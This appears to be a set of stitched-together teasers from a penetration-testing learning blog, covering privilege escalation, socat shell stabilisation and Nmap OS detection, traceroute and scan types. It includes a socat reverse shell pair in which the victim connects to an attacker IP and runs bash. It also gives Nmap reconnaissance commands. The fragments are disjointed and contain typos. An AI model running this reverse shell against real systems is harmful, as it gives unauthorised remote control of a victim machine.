Today, I'm taking a look at using sudo to escalate a local user privilege to a root (administrator) privilege.
One of the paths to privilege escalation on Linux is a Kernal Exploit. This post will be showcasing how Kernel Exploit works.
Tool used to establish a more stabilize shell compare to netcat. Features:
Used of the arrow key Allows for interactive commands such as sudo Use of CTRL + S, CTRL + C Reverse Shell for Linux Attacker:
socat TCP-L:<port> FILE:tty,raw,echo=0 Victim: socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane Additional step: Open a new command prompt, and type stty-a, record the value of rows and columns
Next, in your reverse/bind shell, type: stty rows <number>
Note: If you need a better view of the image, you can right click on the image -> Open image in a new tab.
OS Detection To initiate a OS Detection with Nmap, you can use the -O For example: sudo nmap -O 192.168.233.139
Traceroute If you want Nmap to find the routers between you and the target, you would add –traceroute For example: sudo nmap -sS --traceroute 192.168.233.139
In this post, I will establish rules to how to figure out which port are closed/open. No matter what type of scan you use. Additionally, we will cover scans to use against firewalls.
Using Nmap, We will feature: service detection to investigate for any vulnerability in a service. Then, we will look at it from a wireshark perspective to see what it look like from a network point of view.